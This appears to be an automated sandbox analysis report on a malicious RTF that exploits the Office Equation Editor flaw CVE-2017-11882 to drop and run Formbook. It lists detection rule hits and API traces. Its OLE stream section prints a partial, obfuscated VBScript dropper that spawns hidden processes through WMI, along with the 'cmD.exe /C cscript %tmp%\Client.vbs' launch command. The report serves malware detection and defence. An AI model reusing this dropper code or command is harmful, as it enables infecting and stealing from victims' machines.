Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs

Document contains OLE streams with names of living off the land binaries

Show sources

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	Stream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs..!..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 = strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	Stream path '_1699974672/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................

Very long command line found

Show sources

Source: unknown

Process created: Commandline size = 4089

Microsoft Office drops suspicious files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\Client.vbs

Jump to behavior

Found suspicious RTF objects

Show sources

Source: Client.vbs

Static RTF information: Object: 0 Offset: 000011FEh Client.vbs

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

OLE indicator application name: unknown

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041E814
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00401030
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041DB34
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041EB8A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00402D90
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00409E5B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00409E60
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00402FB0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4E0C6
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B7D005
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B6905A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B53040
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4E2E9
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF1238
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF63BF
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B763DB
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4F3CF
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B52305
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B9A37B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B57353
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B85485
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B61489
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B8D47D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B6C5F0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5351F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B96540
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B54680
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5E6C1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B9A634
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF2622
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5C7BC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BD579A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B857C3
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BEF8EE
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B7286D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5C85C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B529B2
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF098E
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B669FE
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BD5955
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00C03A83
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BFCBA4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4FBD7
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BDDBDA
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B77B00
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BEFDDD
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B80D3B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5CD5B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B82E2F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B6EE4C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BECFB1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B60F3F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B7DF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02381238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DE2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E2305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0232A37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E7353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DF3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_023063DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0230D005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E3040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DE0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02382622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E4680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022EE6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022EC7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0236579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_023157C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0231D47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F1489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02315485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02326540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022FC5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02393A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02307B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0238CBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0236DBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DFBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0230286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022EC85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0237F8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02365955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E29B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0238098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F69FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02312E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022FEE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F0F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0230DF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02310D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022ECD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0237FDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008E814
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008EB8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00072D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00079E5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00079E60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00072FB0

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: amsi.dll

Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\calc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\calc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write

Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED	Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html

Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B4E2A8 appears 38 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B9373B appears 238 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B93F92 appears 132 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00BBF970 appears 81 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B4DF5C appears 118 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0234F970 appears 81 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 02323F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0232373B appears 238 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 022DE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 022DDF5C appears 118 times

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A360 NtCreateFile,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A410 NtReadFile,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A490 NtClose,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A35A NtReadFile,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A48A NtClose,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B400C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40078 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B410D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40060 NtQuerySection,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B401D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B41148 NtOpenThread,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B407AC NtCreateMutant,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B41930 NtSetContextThread,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F938 NtWriteFile,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FAB8 NtQueryValueKey,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FB50 NtCreateKey,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B41D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FE24 NtWriteVirtualMemory,
